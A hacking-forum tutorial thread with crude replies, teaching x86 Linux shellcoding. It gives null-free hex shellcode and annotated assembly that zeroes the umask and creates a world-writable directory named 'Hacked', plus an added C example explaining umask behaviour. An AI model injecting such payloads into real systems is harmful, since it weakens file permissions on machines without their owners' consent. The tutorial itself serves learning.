EvilZone
Hacking and Security => Tutorials => : parad0x November 10, 2015, 10:22:32 PM
-
Here's the part 2 of my previous tut HERE (https://evilzone.org/high-quality-tutorials/a-brief-look-into-shellcoding/)
I would recommend reading my previous tut before starting this one ;)
Moving on to mkdir shellcode: this shellcode creates a directory with permissions 777, which means read, write and execute for all. :)
Algorithm
Make umask 0, then create a directory with permission 777 (in octal) and simply exit.
Now the question arises why did we make umask 0?
The answer lies in the functioning of mkdir: if you pass mkdir some permissions for creating a directory, it sets the permissions of the newly created directory to ~umask & (permission). So by making umask 0, ~umask = 11111111 (NOTE: here every 1 corresponds to a bit), which means whichever permissions you give for the directory, they'll be applied as they are. Got it? Cool.. let's move your ass further. :D
I've removed all the nulls from the shellcode, made it PIC and here is the shellcode:
\x31\xdb\xf7\xe3\xb0\x3c\xcd\x80\x31\xc9\x5b\xb0\x27\x66\xb9\xff\x01\xcd\x80\xb0\x01\xcd\x80\xe8\xe4\xff\xff\xff\x48\x61\x63\x6b\x65\x64
In assembly, it is:
.text
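.globl _start
shellcode:
    xorl %ebx, %ebx     # ebx = 0, the mask argument for umask
    mull %ebx           # edx:eax = eax * ebx = 0, clears eax and edx
    movb $60, %al       # syscall number 60 = umask
    int $0x80           # umask syscall on x86 system
    xorl %ecx, %ecx     # clear ecx before loading the 16-bit mode
    popl %ebx           # return address pushed by call = address of the "Hacked" string
    movb $39, %al       # syscall number 39 = mkdir
    movw $0777, %cx     # mode 0777 (octal), loaded as a 16-bit value
    int $0x80           # mkdir syscall
    movb $1, %al        # syscall number 1 = exit
    int $0x80           # Exit syscall
_start:
    call shellcode      # pushes the address of the string that follows
    .asciz "Hacked"     # Name of the directory to be created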
If you know assembly, the code is fairly self-explanatory; if you're having problems understanding what the fuck I've given, go learn assembly 8)
(http://s8.postimg.org/k43en6ffp/Screenshot_from_2015_11_11_02_21_14.png)
After putting the shellcode in a C program, we verify it :D
(http://s7.postimg.org/b33nyqkm3/Screenshot_from_2015_11_11_02_26_38.png)
Now you've created a directory with permission 777, go play with it ;)
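The umask arithmetic described in the post above, as an added example that is not part of the original post: a small C program that creates a directory with a requested mode under different umask values and reads back the permission bits the kernel stored. The function name and the /tmp scratch path are assumptions made for this example.

```c
/* Added example, not from the original post: shows how the process umask
 * filters the mode passed to mkdir(2). Function name and path are made up. */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create a scratch directory with `requested` mode while the umask is `mask`,
 * then return the permission bits actually stored, or -1 on failure. */
int mkdir_mode_under_umask(mode_t mask, mode_t requested)
{
    char path[64];
    struct stat st;
    int result = -1;

    /* Constructed scratch path; the pid keeps concurrent runs apart. */
    snprintf(path, sizeof path, "/tmp/umask_demo_%ld", (long)getpid());

    mode_t old = umask(mask);          /* umask() returns the previous mask */
    if (mkdir(path, requested) == 0) {
        if (stat(path, &st) == 0)
            result = (int)(st.st_mode & 0777);
        rmdir(path);                   /* clean up the scratch directory */
    }
    umask(old);                        /* restore the caller's mask */
    return result;
}

int main(void)
{
    const mode_t masks[] = { 022, 077, 0 };

    for (size_t i = 0; i < sizeof masks / sizeof masks[0]; i++)
        printf("umask %03o + mkdir(0777) -> %04o\n",
               (unsigned)masks[i],
               (unsigned)mkdir_mode_under_umask(masks[i], 0777));
    return 0;
}
```

With the common default umask of 022 the 0777 request comes out as 0755; only with umask 0 does the directory end up world-writable, which is why a 0777 directory appearing outside the usual temp locations is worth flagging in a file-permission audit.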
-
You're missing the "d" in coding in your title.
-
I don't know assembly so it's still quite a bit over my head but seems nice. Where's the porn behind your terminals tho? I thought we had an agreement.
-
Sorry folks, it was like 3 in the morning and I was feeling sleepy. :P
-
I don't know assembly so it's still quite a bit over my head but seems nice. Where's the porn behind your terminals tho? I thought we had an agreement.
He opted out because he's a vag.
-
I don't know assembly so it's still quite a bit over my head but seems nice. Where's the porn behind your terminals tho? I thought we had an agreement.
I said I'll ask and then post those spicy backgrounds, re-read the logs. Btw Decepticon's logo is cool, don't you think so, it seems a bit misaligned but is quite perfectly aligned on the login screen.